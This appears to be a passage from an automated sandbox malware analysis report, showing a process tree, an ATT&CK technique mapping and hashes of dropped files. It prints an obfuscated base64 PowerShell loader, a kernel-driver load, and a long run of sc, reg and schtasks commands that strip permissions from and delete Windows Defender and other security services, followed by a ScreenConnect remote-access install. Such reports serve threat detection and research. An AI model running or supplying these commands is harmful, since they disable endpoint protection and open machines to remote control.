N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10374380101\3a9b39d862.exe"C:\Users\Admin\AppData\Local\Temp\10374380101\3a9b39d862.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D088.tmp\D099.tmp\D09A.bat C:\Users\Admin\AppData\Local\Temp\221.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe" go9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D182.tmp\D183.tmp\D184.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2236
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:1508
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3028
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2840
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1228
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1848
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:364
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:3044
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:1404
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:2056
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:1616
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:2364
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:1008
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:2984
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:2456
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:2968
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:1556
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:3016
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:1912
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵PID:2504
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:892
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:2000
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:1980
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:1696
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:1900
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:2508
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:2500
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:2316
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:1588
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1756
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1592
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:2876
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:2788
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:2696
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:2684
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:2772
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:2796
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:2620
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:2748
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:2860
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:2448
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:2536
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:1560
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:2656
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:2728
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:3060
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:2180
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:2928
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:2808
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:2616
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:2164
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:1104
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:1620
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:3008
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2940
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:2988
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe"C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:684 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"7⤵PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"6⤵PID:1844
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD52f0f5fb7efce1c965ff89e19a9625d60
SHA1622ff9fe44be78dc07f92160d1341abb8d251ca6
SHA256426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458
SHA512b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920
-
Filesize
655KB
MD5a5d54aec929d9e29b3d1f6fa41be18d3
SHA1ff930ca08e51c881e715368278dc2b40025ed8ad
SHA2561cf669c3b5d3f77681ace20b2d974b380e729382ad38cad33b1810f9750fa94b
SHA51273cc01b6495ca0ff7e360b90dc1e9f2beccc5d012c745aa4ce84158ecfdb5f99fb7da91207cfbf9188f34e59932f8fe184fd6f4d7b14dd2d0c19b21e5aa5c2c3
-
Filesize
5.4MB
MD5c442de9eda228967ecc5519bbea2c07d
SHA1546191da8d80f6367dd0b743e986399052b63142
SHA2568c7fda2a4b26d0c1a5f83096b4b27894bde05d8356d2611612a0d02d2e3be9fb
SHA512d33672098823dc81fe79716a35378d3c1eceb22357c8313f1b68d0c4cf82a29b622f2c919ab82f9ee08d3af1452240887083fe7a214e6a47830189b4f221daa6
-
Filesize
158KB
MD56fa0611a9e1348246fa21da054dd95bb
SHA11b673314b0ba771d690d6f3bccf34082e2e4c294
SHA2562e01911a0853b660f1583d50a8755a4a1f67f17ce6d19d3c24b9f61d1c13f01d
SHA512e6168791c1ec105cb66263cef029eeea5592d1f495f5ada10bbbb4d669d757f69cab3a9c09e12b10943cac1dd03602a7ab1bf2fe687876ee8aef541990875759
-
Filesize
1KB
MD5e5ddb7a24424818e3b38821cc50ee6fd
SHA197931d19f71b62b3c8a2b104886a9f1437e84c48
SHA2564734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea
SHA512450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21
-
C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi
Filesize4.9MB
MD510c91dc10d879dc9dee41b096b07990f
SHA188a88a18ab6bf7dbc3ba3c7f3aefdacae4aab1f6
SHA256c4086437c5cffad66379d512a59471aec5bdc81bd59b5ff6403dffe869d0a501
SHA512d15fcd050f1643f12a529bf9c033181585a4bd389df485bccc3e7d07d98c8dbf2199c17f7e3e4a1212e6c1d4f946586ec30605ee6f264e6b25e925f22a54459e
-
Filesize
717B
MD50caac5126454d5213b4d41d636286ee8
SHA115a034ac9aacdd40a695f9f3374684915e14701c
SHA256037b885ed84da6e6405599cbe5f75d5d57b9632a9f6c507f7012ab2c7689ddc9
SHA5122883bf43f6d393d422cfb4bd8067789b74c6c00c3fd395d5906c9ad47a82a8d12eb7701b61c4d043bacf254da258a14b36f57bcf917d2314c0ef27cc668de50a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50180905f19b8c4e2377224b407320aad
SHA1954c35099409d719aa227b6d66a23d83b84efd56
SHA2568ad44c8055f245e20681a54af5e2f5020d8bd3666bcd2ba83b6e8b3fd1e09615
SHA512355224f59facde750494cfcaeb6bc122acf31326846f603eb16675dda9c5280dcf0955af40006695269a153db7799c307e4f0b441604930b4629245844a508fd
-
Filesize
1.8MB
MD589431b16b25281a50a173f359ecbcebf
SHA1a5931bc59fd615f199461eb009262d26ff34c814
SHA25678d33d02042213510b32b2c13599a33d000cc66fd295714300a557872cfc125e
SHA512498c9a04ef7a5e60d249207dc25db7e3f38dc4339be10702a02d5c922ec30be0b254c8a55552642c1540aeec6dfa26de49a7abd7f65d7a6978352720d9adb7f2
-
Filesize
327KB
MD5dfbc5f5696ac1ed176979706f40923e8
SHA1b3ad04189502558184037ae150f1ae4e50927560
SHA25698d2ce957150f0163bc11537b259e37fda34304aa39702a331fad8070dbf97b5
SHA5120aa50d39b0f1cb7ee9c1e5004ce5aa3905317bdb605f8efdf13977abfce423292fe1acfb698504e36f567604a079c1fde8a1ff60b96141be5b969dfa018ae22f
-
Filesize
88KB
MD589ccc29850f1881f860e9fd846865cad
SHA1d781641be093f1ea8e3a44de0e8bcc60f3da27d0
SHA2564d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3
SHA5120ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502